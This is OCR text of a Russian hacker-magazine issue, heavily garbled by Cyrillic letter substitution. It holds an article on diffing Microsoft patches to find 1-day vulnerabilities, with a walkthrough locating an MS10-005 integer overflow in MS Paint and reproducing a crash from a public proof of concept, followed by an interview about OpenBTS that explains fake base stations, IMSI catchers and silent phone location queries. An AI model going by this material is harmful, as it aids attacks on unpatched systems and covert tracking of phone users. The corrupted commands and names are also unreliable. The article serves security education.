ехрапСІ - Р: * ирсІаТе.тви -г 

С : \ехТгасТес1_Я1е5 



3. МісгоБоНРаІсЬРіІеІтвр) 

твіх раТсЬ.швр /оиі 
С:\ехТгас1:ес1_б1е5 

Скачать ппзіх.гір можно по ссылке: 
ЫСІѵ-ТтО ТдО 

4. ^іпсІоѵѵ5ІП5ІаІІегРаскаде|т5І) 

твіехес /а веТир.тзі /дЬ 
ТАК6ЕТ0ІК=С : \ех1;гас1:ес1_б1е5 



V 




ТигЬо(]іН: сравнение функций 




Особая благодар- 
ность за помощь 
при подготовке ма- 
териала вирусному 
аналитику компании 
Е5ЕТ Александру 
Матросову! 



БД, процесс анализа файлов очень медленный. 
Плюс очень простые алгоритмы, что приводит 
к «шуму» (много исправлений кода, которые 
не меняют смысл кода). 

РАТСН0ІРР2 

Любимый многими (и мной в том числе) за свою 
скорость работы плагин для ЮА Рго, под- 
держивающий весь необходимый функционал 
для сравнения двух исполняемых файлов ( собе. 
дооаІе.сот/р/ра1сЬбі((2 ). Обладает стандартным 
для таких программ интерфейсом, разделенным 
на две части. К положительным чертам относит- 
ся то, что проект полностью открытый, а также 
его высокая скорость работы — алгоритм 
сравнения достаточно простой, хотя и имеет не- 
сколько уровней. На мой субъективный взгляд, 
этому плагину не хватает только хорошего соб- 
ственного бІЛ, такого, например, как у ВіпОі((. 

ВОККЕН 

Воккеп (і рго]есІ5/Ьоккеп ) пред- 

ставляет собой 61Л для двух хорошо известных 
проектов Руеѵу и Рабаге и является единствен- 
ным представителем из мира УМІХ в текущем 
обзоре. Не вдаваясь в подробности, можно 
сказать, что это своего рода швейцарский нож 
для реверсора в *піх-системе. Он имеет в своем 
составе: дизассемблер, граф передачи управ- 
ления, Ьехсіитр и многое другое. Что особенно 
радует и вселяет оптимизм — в своей последней 
версии он уже начинает отдаленно напоминать 
ЮА Рго. К тому же в последнем релизе появи- 
лась возможность для сравнения двух бинарных 
файлов — как раз то, что нам надо. 

ОАРУЫОРІМЗ 

Оагипбгіпп (сіагипогіт.ого і написан чело- 
веком по имени Чон Ук О Реопд ѴѴоок ОЬ), 
который начинал свою работу в еЕуе Оідііаі 
Бесигііу над проектом ЕВ05 (еЕуе Віпагу ОіНіпд 



Зиііе). Данный инструмент обладает удобным 
веб-интерфейсом с продуманной навигацией, 
но основным преимуществом перед конку- 
рентами является наличие автоматизации 
многих рутинных задач: скачивания патчей, их 
сортировки, определения вероятности наличия 
зесигііу-исправления внутри измененной функ- 
ции. Данный функционал сложно переоценить. 

А еще добавь к этому несколько способов за- 
пуска (Напсіу, ВаІсЬ-аЫе, Оиіск, РеаІІу зсгірІаЫе) 
и возможность создания своих паттернов поиска 
зесигііу-фиксов на РуШоп. В общем, неудиви- 
тельно, что данный проект активно развива- 
ется, имеет хорошее сотпіипііу вокруг себя, 
а ѵѵогкзНор'ы по нему проходят на ВІаскНаІ. 

Для него также есть очень полезное расши- 
рение — ОагипбгітБсгірІ ( сосіе.доодіе.сот/р/ 
(іагип-дгіт-зсгір! ). которое предоставляет 
скриптовый интерфейс к программе, что в ре- 
зультате позволяет еще больше автоматизиро- 
вать работу с ОагипбгітЗ при анализе патчей. 



ПАТЧИ МІСР050РТ 



Наибольшей популярностью среди злоумыш- 
ленников пользуются патчи, выпускаемые 
корпорацией МісгозоД. И это неудивительно: 
принимая во внимание огромные размеры 
армии пользователей ѴѴіпсІоѵѵз, даже І-бау экс- 
плойт может собрать число жертв, достаточное 
для организации нехилого ботнета. Принимая 
во внимание сложившиеся тенденции, нельзя 
обойти стороной эти патчи и не рассказать 
об их формате. Для примера возьмем старое 
обновление М51 0-067, которое можно скачать 
по ссылке ЫМу/бУРдпо (другие исправления 
также можно легко скачать, лишь изменив 
М510-067 на нужное значение), и скачаем за- 
платку для русской версии ѴѴіпсІоѵѵз ХР 5РЗ х86. 
Для извлечения файлов из скачанного патча 
необходимо в командной строке выполнить 
следующую команду: 



1 Программа- 


.11 


I) Раздабот^к 


і 1 


ОагипбгітЗ 


бесплатно 


ЗеопдѵѵоокОН 


плагин для ЮА 


ВіпОі« 


$200 


2упатісз 


плагин для ЮА 


ТигЬоОі(( 


бесплатно 


СогеЗесигіІу 


плагин для ЮА 


Ра1сЬ0і((2 

еЕуе Віпагу ОіШпд 5иі1е (ЕВ05) 


бесплатно 

бесплатно 


ТепаЫе Меіѵѵогк Бесигііу 
еЕуеОідіІаІбесигіІу ““ 


плагин для (ОА 

сам О стояі^ь н оТГІО^^' 



Сравнительная таблица средств для анализа патчей 
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С0ѴЕК5Т0КУ 





Анализ уязвимости М510-005. В паре шагов от падения М5 Раіп( 



ВіпОИ! также определил, что изменилась лишь одна функция 



>с : \ЫіпсІ0М5ХР-КВ2259922-х86-Ки5 . ехе ^ 
/х:оиХ 

В результате патч распакуется в папку оиі. 
После этого содержимое папки оиі будет иметь 
примерно следующий вид: 

• папки: 5Р360Р (не всегда), 5Р30РЕ, ирсіаіе; 

• файлы: зрппзд.сЛІ (сообщения пакета обнов- 
лений), зрипіпзі.ехе (программа для отмены 
установки пакета обновления ѴѴіпсіоѵѵз). 

В папке ирсіаіе содержится вся необхо- 
димая информация по установке обновле- 
ния. Файлы, помеченные как 60Р (бепегаі 
ОізІгіЬиІіоп), содержат изменения, которые 
связаны только с безопасностью данных 
бинарных файлов. Как правило, данный вид 
патча устанавливается при обновлении через 
\^іп(іоѵѵз Іірсіаіе. Файлы же, помеченные 
как ОРЕ/ЮР (Оиіск Ріх Епдіпеегіпд / Ытііесі 
ОізІгіЬиІіоп Реіеазе), содержат изменения, 
связанные с безопасностью, и просто функ- 
циональные изменения, внесенные в них 
за все время текущего 5Р. В общем, дан- 
ная структура папок является стандартной 
для ѴѴіпсіоѵѵз ХР, начиная с 5Р2. 

Ситуация с патчами в операционных систе- 
мах Ѵіз1а/^іп7 несколько отличается — там 
заплатка устанавливается с помощью установ- 
щика с расширением глзи, который распаковать 
уже не так просто, как тзі. Хорошо, что на этот 
случай есть тулза тз-раІсЬ-ІооІз от ребят 
из іОе^епзеІаЬз (см. соответствующую врезку). 

В целом это, наверно, все, что нам понадо- 
бится знать о патчах Місгозо!! при написании 
собственного 1-сІау. 



ПУТЬ К РОС 



Путь к намеченной цели (РоС-эксплойт) терниа. 
Если в случае, когда мы сами находим уязвимоаь 
с помощью фаззинга, у нас на руках уже имеется 
готовый 1ез(-сазе, который приводит к ошибке (то 
есть, можно сказать, РоС), и нам остается только 
определить, возможно ли проэксплуатировать 
найденную уязвимость или нет (а если возможно, 
то доделать наш РоС и получить готовый боевой 
эксплойт), то при поиске уязвимостей методом 
анализа патчей придется сначала определять, 
как заставить программу дойти до данного 
бажного участка кода. А это часто оказывается 
очень сложной задачей. И тут начинается гугле- 
ние, разбор в предметной области, применение 
таких продвинутых технологий, как ТА (Таіпі 
Апаіузіз) и ОВІ (Оупатіс Віпагу Іпзігитепіаііоп), 
игра с трассировкой и причинно-следственными 
связями. Но самое важное — это иметь терпение 
и желание, и тогда все получится. 

Эта тема достаточно обширна и достойна 
отдельной статьи, поэтому, к большому со- 
жалению, уместить ее в рамках данной просто 
не получится. Но мы обязательно постараемся 
подробно осветить ее в следующих номерах. 



ПРАКТИКУМ 



Ну а теперь настало время рассмотреть на прак- 
тике, как происходит поиск уязвимости. Для на- 
глядности и простоты возьмем М51 0-005 І ЫМѵ/ 
ІІАуууА). Официальный сайт Місгозо^І сообщает 
про данный патч следующее: «Это обновление 
для системы безопасности устраняет обнару- 
женную пользователями уязвимость в Місгозоіі 
Раіпі. Она делает возможным удаленное вы- 
полнение кода, если пользователь открывает 



специально созданный ЭРЕб-файл в приложе- 
нии Місго5о!і Раіпі. Риск для пользователей, 
учетные записи которых имеют ограниченные 
права, меньше, чем для пользователей, работа- 
ющих с правами администратора». Итак, что нам 
известно на данном шаге? Уязвимость находится 
в М5 Раіпі, проявляется при открытии ЭРЕ6- 
файла. Пока не густо, идем собирать информа- 
цию дальше. Сайт БесигіІуРосиз еще немного 
пролил свет на данный патч, сказав, что уязви- 
мость имеет тип іпІедег-оѵегЛоѵѵ. Ну, уже хоть 
что-то. Пока больше не будем терять время 
на поиски информации, а пойдем на сайт мелко- 
мягких и по приведенной выше ссылке скачаем 
патч. Практиковаться мы будем на ѴѴіпсіоѵѵз ХР 
5Р2, так что для нее и качаем заплатку. Рас- 
паковываем патч в папку раісііесі: 

>с : \Міпсіом5ХР-КВ978706-х86-Ки5 . ехе 
/х:ра-СсЬес1 

Заходим в нее и ищем папку 5р2дсіг, в которой 
и будет лежать исправленная версия файла. Те- 
перь, когда оба файла (уязвимый и пропатченный) 
у нас в руках, остается только их сравнить, чтобы 
найти баг. Для сравнения файлов будем исполь- 
зовать описанный выше инструментарий, а имен- 
но ЮА Рго 6.1 с плагинами ВіпОіИ и РаІсЬОі^і2, 
а также ЮА Рго 5.5 с плагином ТигЬосіііТ Заодно 
проверим, как покажут себя эти инструменты 
в «боевых» условиях. Запускаем ЮА и сравни- 
ваем файлы сначала при помощи ВіпОіі!, затем 
РаіЬОіИ2 и напоследок ТигЬосіііТ Надо сказать, 
что все инструменты показали себя с хорошей 
аороны, определив, что только одна функция из- 
менилась, а оаальные остались идентичны. 



Наверняка при прочтении статьи утебя промелькнула мысль: «Было бы круто, 
если б можно было на основании патча автоматически сгенерировать готовый 
РоС-эксплойт». Спешу тебя обрадовать, в данном направлении уже вовсю 
ведется разработка. Например, есть такой интересный проект под названием 
АРЕ6 (Аиіотаііс РаІсЬ-ЬазесІ Ехріоіі бепегаііоп, ѵ/Ѵ4КЬЕ(і 1. разрабатыва- 

емый университетом ВегІ<еІеу. Впервые он был представлен на конференции 
ВІаск Наі 2010 известным исследователем безопасности Чарли Миллером. Как 
можно увидеть из названия, АРЕ6 как раз предназначен для автоматической 
генерации эксплойта на основании патча. 



Если ты чувствуешь, что уже готов сделать свой первый мегакру- 
той 1 -(іау эксплойт, но еще не определился с выбором цели, то 
советую тебе обратиться к списку Меіазріоіі под названием Тор 
50ЕхрІоіІз( ). Он содержит перечень пропатченных 

уязвимостей в программных продуктах МісгозоН, АсІоЬе, Огасіе, 
Арріе, НР, ІВМ и МоѵеІІ, эксплойты к которым команда Яарісі? была 
бы счастлива видеть в Меіазріоіі. Сделав эксплойт из этого спи- 
ска, ты не только повысишь свой уровень знаний, но и получишь 
шанс заявить о себе и стать контрибьютером Меіазріоіі. Дерзай ! 
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1-сіау сплоиты 





Ра(сЬ0ІМ2 нашел одну функцию, которая изменилась 



Интерфейс Оагипбгіт 3 




ВіпОіМ. Смотрим, что изменилось в функции СВтр5(геат::\^гі(е 



Ра(сН0іН2. Видно, что добавилась пара проверок перед вызовом РеАІІосВиИег 



Это функция СВтр5ігеат;:ѴѴгие(ѵоіс1 
С0П5І *, ипзідпесі Іопд, ипзідпесі Іопд *), рас- 
полагающаяся по адресу 01030Р60. Выбираем 
ее из списка и нажимаем <СігІ + Е> — по- 
смотреть, что конкретно изменилось. Даже 
беглого взгляда достаточно, чтобы определить, 
что в новом файле добавилось несколько до- 
полнительных проверок (01030Р9Е и 01030РА6), 
по результату которых функция либо продол- 
жает нормально работать, либо возвращает код 
ошибки: 

>01031069 тоѵ еах, 0x80004005 

В непропатченной версии этих проверок 
нет и переполненное значение еах, попав 

в качестве аргумента в функцию СВглрЗігеат 

РеА11осВи^(ег(512Е_Т сіѵѵВуІез), вызывает паде- 
ние программы. 



Уязвимость локализована, осталось дело 
за малым — за эксплойтом :). По идее, дальше 
надо создать ЗРЕб-файл и выяснить, какие дан- 
ные из него влияют на содержимое еах. После 
чего придумать, как внедрить свой шелл-код, 
как передать на него управление, и вуаля — 
эксплойт готов. Но как писать шелл-код и экс- 
плойты, на страницах журнала говорилось уже 
не раз, поэтому мы сэкономим место и время 
и воспользуемся готовым эксплойтом для этой 
уязвимости, который вызывает отказ в обслужи 
вании (Ьи.Іѵ/ЦЦппРбР І. Он представляет собой 
небольшой РегІ-скрипт, генерирующий ЗРЕб- 
картинку, при открытии которой Раіпі «валит- 
ся». Для этого по смещению 187 байт от начала 
ЗРЕб-файла записывается большое число (в 
эксплойте это \х93\хСЕ\х93\хСЕ). Создаем кар- 
тинку и ставим бряк на инструкции сравнения 
по адресу 01030Р9А. Запускаем программу под 







^ 


Из приведенной справа 


Маіѵуаге 


Ѵиіп 


таблицы видно, что вирусо- 


Т014 


М510-092 


писатели не брезгуют 1 -сіау 


Ѵ\/іп32/Ьос1ргоІ 


М510-015 


эксплойтами и активно 


ѴѴіп32/СагЬегр 


М508-025 


применяютанализ патчей 


ѴѴІП32/ 




Місгозо^І для распростра- 


Тго]апОоѵупІоасІег. 


М510-046 


нения своих детищ. 


СЬугліпе 
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Отличные примеры РакЬ -► РоС: 

• М510-081 — ЬіІ.Іу/ѴіиКйЛ* 

• М511-077 — Ьи.Іу/гР2)Нѵ ; 

• М511-080-ЬііЛу/5д РИ2 Е. 



Информация, касающаяся патчей 
мелкомягких: 

• Ыиу/Ц9СУВх1 

• Ьіі.1у/кпе!ТМ; 

• Ьи.Іу/Ѵ4РХр(і; 

• ШіІ ШЩ ; 

• Ьи.1у/ртд р9х. 



Легальный рынок поп-гего-сіау- 
эксплойтов от N55 ІаЬв: 
ехрІоіІкиЬ.сот . 



отладчиком, выбираем зараженный ЗРЕб-файл 
и открываем его, в результате чего срабатывает 
наш брейкпоинт. Пока значение еах в норме, од- 
нако после нескольких проходов там оказывает- 
ся подозрительно большое значение РРРЕА20А. 
Это значение также удовлетворяет проверке, 
поэтому, трассируя код дальше, видим, что оно 
передается в СВглр5ігеат_РеАІІосВи^(ег. 
Нажимаем еще раз на <Р8> для выполнения 

СВглрбІгеат РеАІІосВи^^ег, и программа 

падает. Вот оно, последствие переполнения. 

Ну что ж, своей цели мы добились — место 
уязвимости локализовали, РоС получили. Одним 
словом, победа за нами :). 

А в качестве домашнего задания для за- 
крепления изученного материала попробуй 
самостоятельно разобраться со свеженьким 
М512-055. 



ЗАКЛЮЧЕНИЕ 



Как видишь, имея на руках патч, найти уязви- 
мость достаточно просто. Намного сложнее ее 
вызвать и тем более проэксплуатировать. Сама 
по себе уязвимость ничего не значит, ценится 
стабильно работающий эксплойт, способный 
обойти защитные механизмы современных 
операционных систем (Соокіе, 5а^е5ЕН, ОЕР, 
А51Р, 5ЕН0Р, 5а1е ипііпкіпд и так далее). До- 
рогу, по которой можно дойти от обычного патча 
к работающему эксплойту, мы тебе указали. 

Она не самая легкая и не самая короткая, но, 
как говорят китайцы, дорога в тысячу ли на- 
чинается с первого шага. А прочитав эту статью, 
ты его уже сделал. Удачи! □□ 
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С0ѴЕК5Т0КУ 



Беседовал Степан Ильин 



50МЕТНІН0 





Интервью с Александром Чемерисом 



АЛЕКСАНДР ЧЕМЕРИС 

ОСНОВАТЕЛЬ СТАРТАПА РАІКЖАѴЕ5 



Традиционно люди, которых мы выбираем для ][-интервью, интересны сразу по нескольким причи- 
нам. Компания Раіг\л/аѵез — самый видный разработчик открытого б5М-стека ОрепВТЗ, что актуально 
в связи с растущим интересом к безопасности 65М-сетей и мобильных приложений. Компания строит 
свой бизнес на ореп зоигсе и предоставляет исходники даже к своему железу. При этом российская 
команда занимается созданием оборудования для развертывания мобильных сетей в развивающихся 
странах, где использование проприетарных решений просто невыгодно. Ну что, мы тебя не обманули? 



БАЗАРНАЯ СВЯЗЬ 



Идеология ореп зоигсе — совместное развитие. Зачем ставить палки 
в колеса другим, когда можно и нужно извлекать пользу из совместной 
работы? Другие все равно будут окучивать свою делянку, на которую мы 
никогда не пришли бы. Например, потому что мы в России, а они в Бан- 
гладеш. В то же время мы можем объединить усилия и вместе работать 
над одним железом и одним ПО, улучшать его. 

К сожалению, телекоммуникационная отрасль ~ одна из тех немно- 
гих, что до сих пор сильно противятся кооперации между компаниями. 
Сложившиеся игроки не делятся наработками ни друг с другом, ни с кем- 
либо еще. Это приводит к неэффективным тратам денег в индустрии. 
Например, прямо сейчас, вместо того чтобы объединиться и делать 
совместно ІТЕ-стек, компании тратят миллионы и миллиарды, чтобы 
каждому сделать свое. Это классический пример синдрома МІН — Моі 
Іпѵепіесі Неге. По-русски — велосипедостроения. 

Примерно так в 80-е годы каждый ПК продавался со своей ОС на борту. 
Каждая компания считала, что раз они сделали компьютер, то ОС тоже 
обязательно должна быть своя. Сейчас это кажется глупостью, ведь 
существует определенный набор ОС, которые можно поставить на ком- 
пьютер. Фактически рынок унифицировался, и никто не изобретает 
собственную ОС. Если ты хочешь сделать компьютер, ты можешь взять 
\Л/іпсІоѵѵ5, Ыпих и поставить их. Если ты делаешь роутер, то с вероятно- 
стью 99% ты возьмешь Ыпих. И тебе понадобится максимум дописать 
пару драйверов. 

К сожалению, в телекоммуникационной индустрии все до сих пор 
занимаются «написанием собственной ОС». Каждому производителю 
оборудования необходимо сделать собственную реализацию стандар- 
тов 6$М, ІІМТ5 и ЕТЕ, что, естественно, повышает порог входа на ры- 
нок. Доминирование проприетарных решений сильно замедляет раз- 
витие отрасли. 

Я считаю это полнейшей глупостью. Необходимо постепенно перево- 



дить телекоммуникационную индустрию на рельсы ореп зоигсе и боль- 
шего взаимодействия. 

ОрепВТЗ должен помочь исправить сложившееся положение. Что это 



АЛЕКСАНДР 

• Окончил МИФИ, фа- 
культеткибернетики 
в 2007 году. 

• После защиты 
диплонаудаленно ра- 
ботал над ореп зоигсе 
проектом $ірХ(арі 
для компании ЗІРег. 



такое? ОрепВТЗ (Ореп Вазе Тгапзсеіѵег 
Зіаііоп) — это первое ореп зоигсе ПО, по- 
зволяющее собрать сеть 65М из подручных 
компонентов. Сточки зрения телефона сеть 
выглядит как обычная 65М-сеть, но внутри 
нее все звонки и 5М5 передаются по ѴоІР. 
С точки зрения сети каждый телефон вы- 
глядит как ЗІР-клиент. 

Для нас ОрепВТЗ — лишь один из ин- 
струментов. Мы предоставляем полное 



решение — базовые станции, опорную 
сеть оператора, возможность писать 
дополнительные сервисы (голосовые 
и 5М5), а также услуги по поддержке 
всего этого хозяйства. 

Раігѵѵаѵез — второй по активности 
контрибьютор в проект. Первый — ком- 
пания Рапде Меіѵѵогкз, которая этот 
проект и основала. Остальные участ- 
ники проекта — индивидуальные 
пользователи, и все они так или иначе 
работают либо с Рапде Меіѵѵогкз, либо 
с Раігѵѵаѵез. 

Самый высокий интерес к нашему решению у небольших операторов 
в развивающихся странах. Там огромное количество людей до сих пор 
не пользуется мобильной связью, потому что она дорогая. Но спрос огро- 
мен, потому как другой связи там попросту нет. В той же Африке только 
30% населения имеет доступ к мобильной связи, но реально люди ис- 
пользуют ее только в крайних случаях. Нормальная ситуация, когда у че- 
ловека есть телефон, но он никогда им не пользуется, потому что звонки 
очень дорогие. С помощью нашего решения проникновение мобильной 
связи можно поднять в несколько раз и дать людям возможность делать 
звонки по разумным тарифам. 

Наш рынок — Азия, Африка, Латинская Америка, Тихоокеанский ре- 
гион. Развивающиеся страны. Хотя для таких решений есть применение 
и в развитых странах. Даже там существуют непокрытые территории, ме- 
ста, где мало людей, где бедное население. Плюс остается и применение 
в чрезвычайных ситуациях — различные системы быстрого развертыва- 
ния и прочее. Популярна система и при создании корпоративных мобиль- 
ных сетей на удаленных объектах, например месторождениях природных 
ископаемых. 



РАІК^АѴЕЗ 

• Стартап, разрабатывающий 
бюджетнуюсистему мобиль- 
ной связи на основе 65М 

и ѴоІР. 

• Второй поактивности 
контрибьютор в проект 
ОрепВТБ— свободную 
реализацию 65М-стека. 

• Основана в 2011 году. 

• Командасостоитиздесяти 
человек. 



0РЕМВТ5 В ЛАБОРАТОРИИ 



Исследователям ОрепВТЗ дает возможность за сравнительно небольшие 
деньги создать свою маленькую 65М-сеть и попробовать с ней поиграть. 

К примеру, это интересно аналитикам безопасности. Чтобы понять, 
как работает мобильный вирус, необходимо поместить его в полностью 
контролируемое окружение. 

Как отследить, что мобильный вирус послал 5М5, если у тебя нет полно- 
го контроля над окружением? Ведь он может звонить на какие-то преми- 
ум-номера, слать 5М5. Либо тебе нужен полный контроль над телефоном, 
что трудно; либо нужно контролируемое окружение с точки зрения сети. 

ОрепВТЗ дает возможность создать сеть, в которой ты все контролиру- 
ешь. Видишь, какие 5М5 были отправлены, какие ІІЗЗО-запросы, какие 
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были совершены звонки. Можешь полностью 
проконтролировать, что делает этот вирус. 

Одна компания, к примеру, заказала у нас та- 
кой стенд: ящик Фарадея, в который поме- 
щается телефон и сама станция, чтобы точно 
быть уверенным, что телефон не подключится 
к какому-нибудь Билайну, МТС или Мегафону, 
а подключится к ОрепВТБ и можно будет понаблюдать. 

Для работы ОрепВТБ необходим трансивер и компьютер, на котором 
будет крутиться софт. Основное в данном случае — трансивер. На рынке 
доступно несколько решений под брендом ОБРР, включая популярные 
модели 05РР1, N200 и ВЮО. 

Цена на эти устройства начинается с 700 долларов, но тогда придется 
купить еще и генератор опорной частоты, что обойдется еще в 250-300 
долларов. 

Сейчас мы уже продаем собственные трансиверы, УтТЯХ. Купить его 
может любой желающий, по цене 1500 долларов. В основе лежит сильно 
переделанный У5РР N200 с двумя каналами передачи данных и инте- 
грированным бР5-приемником, поэтому разница в стоимости с самы- 
ми бюджетными решениями не так значительна. Кроме того, в отличие 
от самых дешевых моделей для связи с компьютером используется 
ЕіЬегпеС а не У5В, что работает куда стабильнее. Впрочем, для сугубо 
лабораторного применения сгодится и У5В, лишь бы не было источни- 
ков статики вокруг. Кстати, УтТРХ — открытое железо и все его исход- 
ники свободно доступны. 

Как правило, мы используем трансиверы без передающей антенны, 
так что ее радиус действия ограничен комнатой. Хорошо, что здесь, в хак- 
спейсе (речь о Nеигоп Ьаскврасе. — Прим, редакции), металлическая 
крыша, это практически своя клетка Фарадея — сигнал значительно 
слабее, чем снаружи. Также к нам приходит меньше сигналов, благодаря 
этому проще работать. Даже если просто высунуть руку за окно, будет 
видно много больше базовых станций, чем из помещения. То же самое 
и с нашей базовой станцией — она не мешает кому-то из операторов, по- 
тому что ее излучение существенно ослабляется. 

Также мы выбираем частоты, на которых никто не работает. Чтобы ни- 
кому не мешать. Если хочется запустить свою б5М-сеть, лучше выбрать 
место, где вокруг мало базовых станций, — дачу, подвал, что-то такое, 
где нет «толкучки» в эфире. 

Настроить ОрепВТБ по первости очень непросто. Мы в свое вре- 
мя потратили несколько месяцев на то, чтобы заставить его работать. 
Но сейчас все стало куда проще. Появились мануалы, есть «ОрепВТБ Іог 
сіитппіез», в котором все расписано по шагам. 

Потом в ѴѴікі ОрепВТБ появился пошаговый 
мануал по инсталляции. Если следовать ему, 
ничего не пропуская, то в конце у тебя получит- 
ся рабочий ОрепВТБ. Мы убили кучу времени, 
потому что не было сіоск-іатег, часы у ОБРРІ 



были плохие, телефоны не видели сеть. Мы 
долго мучились и в конце концов создали свой 
сіоск-іатег, тогда у нас все заработало. 

Человеку, который хочет поднять свою 6БМ- 
сеть, понадобится компьютер с Ііпих. В вир- 
туалке все это работает очень плохо, поэтому 
нужен нормальный компьютер с Ыпих. Сразу 
скажу, что всякие слабенькие АРМ, вроде РазрЬеггу Рі, не тянут. Нужен 
Аіот или что-то мощнее. В принципе, Аіот хватает. Дальше придется ку- 
пить либо ІІБРР, либо наш ІІглТРХ. 

Вместе с УтТРХ мы хотим также продавать Ііѵе-флешку, которую 
достаточно вставить в комп, а на ней сразу есть Ыпих, ОрепВТБ и так 
далее. Чтобы люди могли сразу получить работающую инсталляцию. 
Сейчас даже у нас уходит полдня-день на то, чтобы просто пройти по ма- 
нуалу и получить готовую инсталляцию! Неудивительно, что в рассылке 
ОрепВТБ постоянно всплывает куча вопросов типа «я начинаю ставить, 
у меня ничего не работает, помогите!». 

Сложности с ОрепВТБ, к сожалению, возникают во всем. Из-за того 
что железо разношерстное и работает непонятно как, бывает много про- 
блем с железом. Не подключил антенну, подключил не туда. Не так на- 
строил мощность на трансивере. В итоге — не работает. Кто-то вообще 
пытается запустить из-под виртуалки, а это гиблое дело. Дальше про- 
блемы уже в самом ОрепВТБ, так как он состоит из нескольких компонен- 
тов и нужно, чтобы они все состыковались друге другом. Также есть базы 
данных, их все тоже нужно настроить правильно. 




Трансивер ІІтТРХ 
в связке с мини- 
компьютером іпіеі ыис 



Достопримечатель- 
ность хакспейса 
Меигоп — местная 
библиотека, полная 
книг, полезных 
и не очень 



Старые мобильники 
Моіогоіа на чипсете 
Саіурво, на базе 
которых можно 
заниматься 
сниффингом 05М- 
трафика 
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Интервью с Александром Чемерисом 



Все программы запускаются на компьютере, притом обычно транс- 
ивер и ОрепВТЗ запускаются на одном ПК, а зіраиіЬзегѵе, БМОиеие 
и РгееБѵѵіІсЬ запускаются либо на той же машине, либо на другом ПК. 
К примеру, у нас на одном компьютере работает трансивер и ОрепВТБ, а 
зіраиіЬзегѵе, 5М0 и РгееБѵѵіІсб запускаются на другом компьютере, ко- 
торый является сервером. Как обычно — на базовой станции работает 
только ОрепВТЗ, а другая является элементом опорной сети оператора. 
То есть у оператора стоит софтсвитч, один 5М5-центр, один зиЬзсгіЬег 
гедізігу, и все базовые станции с ними общаются. 

Сейчас ОрепВТЗ не реализует как минимум передачу данных и 11550- 
запросы. Таким образом, в основном это эффективный инструмент 
для вредоносов, отсылающих 5М5 и использующих для работы ѴѴі-Рі. 

В будущем будет реализована поддержка 6РР5. Реализацией 36 
в ОрепВТБ мы заниматься не планируем, так как это тупиковая ветвь. 

Следующий шаг — поддержка ІТЕ. Для этого можно использовать 
даже существующее оборудование. Есть такой Фабрис Беллард, кото- 
рый написал стек для ІТЕ, к сожалению, не ореп зоигсе, но рабочий. Мы 
встречались с ним в Париже и договорились о том, что пришлем ему не- 
сколько наших плат ІІтТРХ, чтобы он запустил на них свой софт. Наде- 
емся, оно заработает. 



ВВЕДЕНИЕ В ПЕРЕХВАТ ДАННЫХ 



Есть два принципиально разных способа 
перехвата. Пассивный и активный. В чем 
разница? 

Активный перехват — это ложная базо- 
вая станция. То есть устройство излучает 
сигнал, представляется базовой станцией, 
телефон коннектится к ней, и дальше что- 
то происходит. 

Пассивный перехват — это когда пере- 
хватывающее устройство не излучает 
сигнал, а просто слушает, что проис- 
ходит в эфире. При этом оно вынуждено 
взламывать шифр, который используется 
для шифрования канала, и только после 
получать данные, которые по этому каналу 
передаются. 

Осуществить пассивный перехват труд- 
нее, ведь нужно перехватить данные плюс 
расшифровать их. Сейчас это стало про- 
ще благодаря тому, что доступны радуж- 
ные таблицы для 65М и достаточно широко известно, как это делает- 
ся. А поднять поддельную базовую станцию, в общем-то, не составляет 
труда. Это осуществимо при помощи любого 65М-оборудования, хоть 
папоВТЗ, хоть ОрепВТБ. Исключительно вопрос конфигурирования ба- 
зовой станции. 

Чтобы создать ІМ5І саІсНег, потребуются некоторые ухищрения. 

Что такое ІМ5І саІсЬег? Это устройство, которое представляется базо- 
вой станцией и передает в эфир такие параметры, что даже при слабом 
сигнале оно считается предпочтительной базовой станцией. Телефоны 
подключаются к ней, она получает с них информацию об ІМ5І и ІМЕІ. 
ІМ5І — это іпіегпаііопаі тоЬіІе зиЬзсгіЬег ібепіііу. То есть интернацио- 
нальный идентификатор подписчика. По сути, уникальный Ю абонента. 
ІМЕІ — уникальный идентификатор телефона, он записан на телефоне. 
Предполагается, что он тоже уникален. Но если ІМ5І всегда уникален, 
потому что так устроена работа операторов, то ІМЕІ реально практически 
нигде не используется, поэтому многие телефоны пишут в него какой-то 
трэш, и он может меняться. 

Можно собрать ІМЕІ и ІМ5І и запросить местоположение телефона 
по протоколу РРІР. Если у телефона есть 6Р5, этот протокол позволя- 
ет запросить координаты местоположения, не спрашивая никаких под- 
тверждений у пользователя. Можно собрать эти данные и отправить 
телефон образно в сеть оператора. Ну или оставить его подключенным 
к базовой станции, если дальше нужно произвести какие-то операции — 
позвонить или отправить 5М5. 



ЕСЛИ В ТЕЛЕФОНЕ 
НЕТ ПОЛНОЦЕН- 
НОГО 6Р5, ЭТО НЕ 
ЗНАЧИТ, ЧТО ОН НЕ 
ПОДДЕРЖИВАЕТ 
ОПРЕДЕЛЕНИЕ МЕ- 
СТОПОЛОЖЕНИЯ 



Такие методы полиция и спецслужбы используют во время след- 
ственно-разыскных мероприятий, чтобы определить местонахождение 
людей. Говорят, что в некоторых странах типа Китая это используется 
полицией иначе. Что-то вроде камер видеонаблюдения: их устанавли- 
вают возле банкоматов, и, если случается какой-то инцидент, можно 
точно знать, какие телефоны находились в окрестностях банкомата 
на тот момент. Не знаю, насколько это правдивая информация, я сам 
такого не видел, но ходят слухи, что в некоторых странах это массовый 
деплоймент. То есть такое ставят часто и полиция использует это по- 
стоянно. 

Отдельный разговор — сам РРІР. Протокол был разработан, чтобы 
обеспечить определение местоположения абонентов во время экстрен- 
ных вызовов. Когда человек звонит 911, по крайней мере в Америке, 
оператор должен определить местоположение абонента и передать эти 
данные в ситуационный центр вместе с информацией о звонке. Поэтому 
протокол и не требует от пользователя подтверждения, работая в «ти- 
хом» режиме. 

Всего у РРІР есть три режима работы. Два 6Р5 и один ОТО — это, 
по сути, триангуляция. ОТО применяется редко — он требует очень точ- 
ной синхронизации между базовыми стан- 
циями, модификации самих базовых стан- 
ций, в общем, он непопулярен. А у 6Р5 есть 
два режима. В первом случае использует- 
ся обычный 6Р5 на телефоне и работает 
как аОР5. Базовая станция передает ему 
первоначальную информацию о примерном 
местонахождении, телефон получает ее 
и уже готовые бР5-координаты отправляет 
на базовую станцию. 

Но если в телефоне нет полноценного 
6Р5, это не значит, что он не поддержи- 
вает РРІР. Второй режим очень интерес- 
ная вещь — аззІБІеб 6Р5. Базовая стан- 
ция сообщает телефону, на какой частоте 
и в какой момент нужно записать данные, 
он записывает и, после минимальных 
преобразований, отправляет их на ба- 
зовую станцию, где они обрабатываются 
и превращаются в реальные координаты. 
По этому способу можно получить даже ко- 
ординаты телефонов, у которых нет полно- 
